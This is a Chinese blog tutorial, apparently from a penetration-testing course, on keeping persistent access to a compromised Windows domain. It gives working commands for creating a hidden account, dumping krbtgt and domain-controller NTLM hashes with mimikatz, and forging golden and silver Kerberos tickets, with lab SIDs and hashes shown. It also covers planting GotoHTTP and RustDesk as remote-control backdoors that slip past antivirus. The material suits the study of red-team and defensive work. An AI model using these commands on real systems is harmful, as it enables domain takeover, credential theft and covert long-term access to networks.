内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP

最新推荐文章于 2024-03-24 13:58:40 发布
最新推荐文章于 2024-03-24 13:58:40 发布
阅读量912 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130740641
版权

0x01权限维持-隐藏用户

CreateHiddenAccount工具

CreateHiddenAccount -u test -p P@sswrd

用户管理能查看到,命令查看看不到,单机版无法删除(不在任何组),域环境(在administrator组中)可以删除
在这里插入图片描述
在这里插入图片描述

0x02权限维持-黄金白银票据

⻩⾦票据⽣成攻击,是⽣成有效的TGT Kerberos票据,并且不受TGT⽣命周期的影响(TGT默认10⼩时,最多续订7天),这⾥可以为任意⽤户⽣成⻩⾦票据,然后为域管理员⽣成TGT,这样普通⽤户就可以变成域管理员。
白银票据(SILVER TICKET)是利用域的服务账户进行伪造的ST,在Kerberos认证的第三步,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。所以只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用(不需要交互KDC,需要知道Server的NTLM Hash)。

一、黄金票据
利用条件:
1.已经拿下域管理员,获取到krbtgt hash
2.利用krbtgt的hash制作黄金票据工具,进行攻击
利用:
1.获取域的sid值,最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

在这里插入图片描述
2.域的KRBTGT账户NTLM-HASH:b097d7ed97495408e1537f706c357fc5

mimikatz privilege::debug
mimikatz lsadump::lsa /patch

在这里插入图片描述
3.伪造用户名:dbadmin(任意用户名)
生成票据:
mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:g
在这里插入图片描述
导入内存

mimikatz kerberos::ptt g

在这里插入图片描述
访问测试:

dir \\owa2010cn-god\c$

在这里插入图片描述
黄金票据总结:
该攻击⽅式其实是⼀种后⻔的形式,属于第⼆次进⾏攻击的⽅法。
第⼀次拿到域管权限之后,需要将krbtgt NTLM hash进⾏保存,当第⼆次再来进⾏域渗透攻击时,我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据,从⽽再次获得域管权限。

二、白银票据
1.已经拿下域管理员,获取到DC hash
2.利用DC的hash制作白银票据工具,进行攻击
利用:
1.获取域的sid值,最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

2.域DC账户NTLM-HASH bfe8cf6709038dd075d4cb5553b56412

mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords

在这里插入图片描述

3.伪造用户名:dbbadmin(任意用户名)
导入票据:(CIFS文件共享服务)
domain:域名
sid:域环境下的SID,除去最后-的部分剩下的内容
target:要访问的服务器,写FQDN
rc4:写的是目标主机的NTLM(主机名$对应NTLM)
service:要访问的资源类型
user:伪造的用户
cifs:共享文件

mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god /service:cifs /rc4:bfe8cf6709038dd075d4cb5553b56412 /ptt

在这里插入图片描述
失败了

白银票据总结
1.伪造的ST,只能访问指定的服务,如CIFS;
2.不与KDC交互,直接访问Server;
3.ST由服务账号 NTLM Hash 加密。

#权限维持-远控软件-GotoHTTP&RustDesk
一、GotoHTTP
利用场景:有网络下,需要绕过杀毒等网络防护
B2C模式,无需安装控制端软件,有浏览器就可以远控。
流量走https协议,只要目标放行443端口出口就可以实现内网穿透。
二、 RustDesk
利用场景:无需网络,需要绕过杀毒等网络防护
1、有网连接:
C:\Users\用户名\AppData\Roaming\RustDesk\config
其中ID和密码在RustDesk.toml文件里。
在这里插入图片描述
连接:
在这里插入图片描述
2、无网内网连接:IP直连
注意权限问题,最好以管理员打开,这样才能创建监听端口,或使用已开启监听的端口
RustDesk2.toml

direct-server = 'Y'
direct-access-port = '8443'

在这里插入图片描述

mushangqiujin
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows权限维持黄金白银票据&隐藏用户&&RustDesk&GotoHttp
剁椒鱼头没剁椒的博客
08-16 1703
总的来说隐藏用户目前的手段基本上服务器出现问题,第一件事都是查询隐藏用户,所以这个算是后门的一种方式,但是现在再来看已经不是那么好用了。这个工具存在一个问题就是有络的情况下才能够使用,而在无络的情况下是无法使用的,同时流量是走https协议,需要目标主机开放443端口。简单来说就是:有络,无限制,可以使用。有络,如果防火墙限制了443端口,无法使用。无络,无限制,可以使用,但是可能需要转发,比较麻烦。无络,有限制,基本上就是无法使用。
无视杀软登录程服务器GoToHTTP
weixin_74245209的博客
06-26 755
渗透测试中,我们会遇到服务器装有杀软导致提权木马上传不成功的问题。gotohttp.exe目录下直接生成了配置文件。上gotohttp官直接输入name,tmp。这里给各位师傅另外提供一种思路。即可上线,随机关闭杀软后续提权。执行命令启动被文件。
gotohttp出连接横向移动
qq_64787896的博客
03-24 192
2.在msfconsole接口运行Gotohttp_x64.exe文件。3.运行之后在同级目录下会生成gotohttp.ini文件。5.访问host,输入name和tmp,连接成功。4.type读取gotohttp.ini文件。1.将gotohttp上传到目标主机。设备:Win12,本地主机。
代理和穿透还能这么玩?
C_tongxue的博客
03-20 1107
程桌面是我每天都要用到的东西,临时在家程公司电脑排查问题,又或者之前广州疫情,需要居家办公程公司电脑工作。程工具其实有很多,如Todesk、TeamViewer、RustDesk、向日葵等,但我在用过之后都觉得这些不好用,不如微软自带的程桌面工具更好用,但这款程工具却只支持局域,而我又有在家程公司电脑的需求,到后来我发现用代理和穿透…
Rust区块琏开发——签名加密与私钥公钥
知来者逆的博客
07-01 1240
Rust 在区块琏开发中使用密钥种子生成公钥私钥对,并对信息进行签名与验证。
rustdesk程服务器以及登录后台搭建以及web端直接
qq_40250122的博客
12-31 6964
rustdesk程服务器以及登录后台搭建以及web端直接
第68天:内安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
攻击者可以创建Golden Ticket(黄金票据)和Silver Ticket(白银票据)来模拟合法的Kerberos票证,以此提升权限。Golden Ticket是伪造的TGT,允许攻击者长时间保持权限;而Silver Ticket则是针对特定服务的伪造TGS...
第71天:内安全-域横向&传输&应用层隧道技术1
08-03
1.代理和隧道技术区别 2.隧道技术为了解决什么 3.隧道技术前期的必备条件 1.双向连接反弹 shell 2.多向连接反弹 shell-配合转发 3.相关 n
渗透之端口转发-代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内机器上执行:lcx.exe –slave 公 IP + 端
渗透知识大全1-87章全部教程
最新发布
04-08
6.内渗透(六)之基础知识-域中的权限划分和基本思想 7.内渗透(七)之基础知识-企业常见安全域划分和结构 8.内渗透(八)之基础知识-企业域中计算机分类和专业名 9.内渗透(九)之内信息收集-手动本地信息收集 10...
搭建docker内私服的方法(docker-registry with nginx&ssl on centos)
01-10
本文介绍了搭建docker内私服的方法,分享给大家。具体如下: 主要思路: 1. Docker Registry 说明 关于如何创建和使用本地仓库,其实已经有很多文章介绍了。因为docker技术正处于发展和完善阶段,所以有些文章...
制——gotohttp
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
02-08 403
gotohttp在我的渗透测试过程中,是一个常见的方式,给我的感觉,即用即连,浏览器连接,方便快捷。但是缺点就是权限划分明确,普通用户权限起的gotohttp无法进行管理员权限操作,比如关闭windows defender和其他一些行为,不过在规避杀软这儿也有奇效。
多机局域办公神器 rustdesk 使用强推!!!
先说一下,就简单地写点儿氵文,不是博客,只是我的笔记本
06-28 1万+
多机局域办公神器 rustdesk 使用强推!!! (有尼玛摘要写的....)
[渗透测试笔记] 49.域渗透黄金票据白银票据
H4ppyD0g的博客
03-17 4573
Kerberos认证协议 《信息系统安全概论》书中对kerberos协议流程做了简化,如下所示 在此用下图做说明 KDC(密钥分发中心)包含身份认证服务器和服务审批服务器(用于票据授权服务TGS) DC是域制器;AD是活动目录。 DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建域时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。 AD会维护一个Account Database(账户数据库). 它存储了域中所有用户的密码Hash和白名单。只有账户密码
使用RustDesk替换FRP建立RDP连接
RustDesk的专栏
11-07 9370
首先参考可自建中继服务器的程桌面软件: RustDesk设置服务器以及客户端,请注意被端和主端都需要设置相同ID服务器地址,不然就会连接到公用服务器上。 设置完毕后,在客户端输入被端ID,点击连接,等待连接建立并验证登录后,请关闭连接,界面上的Recent Sessions区域会出现你刚刚连接的被端,点击其右下角菜单(如下图所示),然后选择RDP,就可以进行RDP连接了。 以上方法只适用于两端都是windows,如果不是,你可以自行设置RustDesk的TCP Tunneling实现,RD
【软件】RustDesk自己搭建制服务软件 支持制手机
热门推荐
xfxuezhang.cn
10-26 1万+
就是非常好用
【内学习笔记】28、黄金票据
TeamsSix 的 CSDN 空间
09-27 499
0、前言 RT 在利用黄金票据(Golden Ticket)进行 PTP 票据传递时,需要先知道以下信息: 伪造的域管理员用户名 完整的域名 域 SID krbtgt 的 NTLM Hash 或 AES-256 值 其中 krbtgt 用户是域自带的用户,被 KDC 密钥分发中心服务所使用,属于 Domain Admins 组。 在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的,因此如果知道了 krbtgt 用户的 NTLM Hash 或者 AES-256 值,就可以伪造域内任意用户的身
域中黄金票据
https://www.cnblogs.com/zpchcbd/
09-11 1234
黄金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个域制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x00 金票据利用条件: 域中krbtgt账户NTLM密码哈希 域中的sid值 一台域中主机 与其说是一种攻击方式,不如说是一种后门,当域权限掉后,再重新获取权限,因为常见...
渗透黄金票据白银票据的区别
03-31
黄金票据白银票据是内渗透中常见的两种攻击手段,它们的主要区别在于: 1. 黄金票据通常是使用被攻破的域制器的管理员账户来获取的,因此具有更高的权限,可以访问域中的所有资源和计算机。而白银票据则是使用已经被攻破的计算机的本地管理员账户来获取的,权限相对较低。 2. 黄金票据通常是用于攻击活动目录服务(Active Directory)中的域制器,因为它可以让攻击者在域制器上执行任意操作,包括创建新的账户、修改密码、添加权限等。而白银票据则更适用于攻击普通的计算机,可以帮助攻击者获取更高的权限。 综上所述,黄金票据白银票据在内渗透中各具特点,攻击者需要根据具体情况选择使用哪种票据来进行攻击。同时,企业也应该采取相应的防御措施,如加强域制器的安全性、限制管理员权限等,以避免遭受此类攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值